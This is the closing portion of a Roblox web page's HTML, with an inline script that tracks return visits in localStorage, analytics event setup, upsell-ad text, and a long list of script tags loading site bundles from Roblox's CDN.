            function dayDiff(d1, d2) {
                return Math.floor((d1-d2)/86400000);
            }
            if (!localStorage) {
                return false;
            }

            var cookieName = 'RBXReturn';
            var cookieOptions = {expires:9001};
            var cookieStr = localStorage.getItem(cookieName) || "";
            var cookie = {};

            try {
                cookie = JSON.parse(cookieStr);
            } catch (ex) {
                // busted cookie string from old previous version of the code
            }

            try {
                if (typeof cookie.ts === "undefined" || isNaN(new Date(cookie.ts))) {
                    localStorage.setItem(cookieName, JSON.stringify({ ts: new Date().toDateString() }));
                    return false;
                }
            } catch (ex) {
                return false;
            }

            var daysSinceFirstVisit = dayDiff(new Date(), new Date(cookie.ts));
            if (daysSinceFirstVisit == 1 && typeof cookie.odr === "undefined") {
                RobloxEventManager.triggerEvent('rbx_evt_odr', {});
                cookie.odr = 1;
            }
            if (daysSinceFirstVisit >= 1 && daysSinceFirstVisit <= 7 && typeof cookie.sdr === "undefined") {
                RobloxEventManager.triggerEvent('rbx_evt_sdr', {});
                cookie.sdr = 1;
            }
            try {
                localStorage.setItem(cookieName, JSON.stringify(cookie));
            } catch (ex) {
                return false;
            }
        }

        GoogleListener.init();


    
        RobloxEventManager.initialize(true);
        RobloxEventManager.triggerEvent('rbx_evt_pageview');
        trackReturns();
        

    
        RobloxEventManager._idleInterval = 450000;
        RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_start');
        RobloxEventManager.registerCookieStoreEvent('rbx_evt_ftp');
        RobloxEventManager.registerCookieStoreEvent('rbx_evt_initial_install_success');
        RobloxEventManager.registerCookieStoreEvent('rbx_evt_fmp');
        

    });
  </script>
  <script type="text/javascript">
   var Roblox = Roblox || {};
    Roblox.UpsellAdModal = Roblox.UpsellAdModal || {};

    Roblox.UpsellAdModal.Resources = {
        title: "Remove Ads Like This",
        body: "Builders Club members do not see external ads like these.",
        accept: "Upgrade Now",
        decline: "No, thanks"
    };
  </script>
  <script data-bundlename="page" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/03772e70e19bd2996b90e1e296a0a8d4.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="StyleGuide" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/7dce9cc810f07250a8a86c0b66f70226bcb93a2da1ad6d619427b3037a402cd2.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="CookieBannerV3" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/325e056e25bc4a167d0bd16463fc2c6683fb17cef494bee497990b8aec2f0995.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Messages" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/18dede93de3aac02225e1e6e9957d98d6983c39fc9e76eb0cdb05090e5551f95.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Messages" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5b148ca445e1fd4ef905bc3665b2e29d065ab357cc88fd68be95b519f6e2da0d.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.Tracking" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/ce6a4105a4d28cac59aa57a3d6615d56ba63526569ebfd88d49ac363d61caddb.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.Tracking" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/fb47e86d6d7deaf62c7c5c8a62d915361b3f9b47503976e24e4fdd44710a492e.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Footer" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/bffafd994791f59d1efb67723313fc0f59b58fef8dec7cf83535c8f4d1d1ebd9.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Captcha" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/b4fc87cb4363aebafcd2034f72fb9e07022e0f13accb3ae8d9da81dc9eb15859.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="CrossDeviceLoginDisplayCode" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/c9aff3415a4c0310ed5a0b05ec26bbfdb5dc59171a6e61a33673af64d14d86c2.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.CrossDevice" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/8e93ba688bf081b524dc54a945cb3f0307d65a2ede01928ae6d0fa6d3b676a94.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.CrossDevice" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5e974d9ade65c974276bb33dc40e342849e25d669c164fa154a0ed2c22e926aa.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="AccountRecoveryModal" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/0cb8d2d6f4d1670adfee3b204fcb3a2dbf61819b82895f8257f0e5055d2c5b2b.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.ResetPassword" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/6154c91d19b0f34b4242f8498697bcbbef565e237c2dd5124abbfd0e5900a6ec.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.ResetPassword" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/a7cae0d9e86a0dcf0e25a1c56e8e4b8d529279d7be48ffaa20c9b3442d74e850.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Controls" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/556d0c65739acf5c4b72d17c9433092f429d513d447d9ac2a918a21132fea0de.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Controls" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/e4c74a5e7d87ef7c6ddb0ff25cd193f6f7495ad1566381290f0bbde36124a4d1.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="ItemPurchase" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/bf6ae6dfa7d79f9ffe1a0c1b3a22c25707722264d9afdd2fae5cc3e7f51e5d70.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Purchasing.PurchaseDialog" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/7918ac8b721b946f2800652b084166ae795408706e447c98a9af8ca3e8a0cbc0.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Purchasing.PurchaseDialog" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/4e1037868737fa797b0e3248bc05479c925d8029ec146d6633aeebd9e0bb6c71.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="IdVerification" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/ede044c5c20355002a54e0373f0fac6509125bb8811b3abdb26d1f5fb96fd43e.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Verification.Identity" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/c066d18ad754d4b672a46107920e8206d22093da36183e5c0c8048d1dbea82db.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Verification.Identity" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/34e63cca1aae541077c77eece3e7604888f5a7a041056b9a464c33381e5f3829.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="GameLaunch" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/8a12f193daf2d6902b7b1e13d6317ec56eadb70fbf6678ced7f86d94dc262bba.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.VisitGame" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/f5964480d72a66fed298d36e9ad7c0a033020f0f488a49773b129905e4390e60.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.VisitGame" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/d720f5c5c32eb353fd76c5a101f47e529363a19bf44c18b01b501e0c648c81b4.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.GameLaunchGuestMode" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/f41ec06eeae79fa94e6ae9f435b0a1c6743085e898884eddb4d4025ca3af8a44.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.GameLaunchGuestMode" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/6852af8f7df15395ccb3d121a914ee7301a7162f5afb3395575c6075c617923f.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="SystemFeedback" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/aac542106f7f77697cbc3b36ab3cf0619bf9b69a1af0983e59dfeb6c36652d3b.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="CaptchaCore" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/d4cb3f0769ad2c961ffef6d480f99f8ab4ecdac3ce6a8cd094dad5878d906d15.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Challenge" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/12f1fe968bbcef57169e9b2d6fa4c088841dfecac14f398ba7e8402718d73c52.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.TwoStepVerification" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/7d0993ac3770036bbe40bd2372b47ff209feb91d1a54f2318d932e92123fba27.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.TwoStepVerification" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/f9d8d37226a01bc53c34886bbbd2f124d6c7bd6444a7b51af4c974caa3d5f36a.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.SecurityQuestions" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/c4cef8806416a99e20844984e5451c9a0202902ffe47af96e55106729714c860.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.SecurityQuestions" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/d16c0b5ab8501a358326c784e301af9ea88a22ef1dee754d7a75ec575f130716.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.Captcha" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/6a01cbf296d3e8aa5fefa3dc991cac628716cceded614fb84cbadfd78f507d85.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.Captcha" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/0f46a1db16bff49a6b3dbb2c17a6723366faf5a93870711a8f92fb9058a1776c.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="ReactLogin" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/582682237f09ec13fa99091dec21b8d614c21a555377b6f07345a02ea143f78b.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.Login" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/58c8ba43599194f6e0f9adbe60390176722657e8a65bf88c0bd40c1009581882.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Authentication.Login" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/07214984073df1595a6d4b70ba4518661d874941248c8778598645a735a62ce7.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.Captcha" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/fe345fa49171e73999c333520b87bb3051dbd4c4e74c2ca9ebf8a8c05110f96a.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.Captcha" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/a6621e0d27855e4e2afe111af5aff2146ad81993b241f77c3188671c2704b7db.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Login" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/2a45137a8ec13d317bc3abfddf40e36c5e930a7e76b4007c32d7c01e0ccc0504.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.IdVerification" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5a479caa4df1afb7857b070b2e8e03918811f8f1fbbc925eca576687773b6408.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.IdVerification" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/6e8a110c397d70c5a9461eb71bbe3db975d3ffd373f09924d49f431b1b0c831c.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.Screentime" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/28d2311ffd0ae82d9c47cfbdb464d41ce8c33fa6af5c03c895fa3867bb44a18e.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.Screentime" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/b1b5b618a2663a457bbf866ec91f6402994eddd1b5f5cf45ed79abc496f03e99.js" type="text/javascript">
  </script>
  <script data-bundlename="pageEnd" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/626ed2b9783a7375a68f25a31c353dbd.js" type="text/javascript">
  </script>
 </body>
</html>
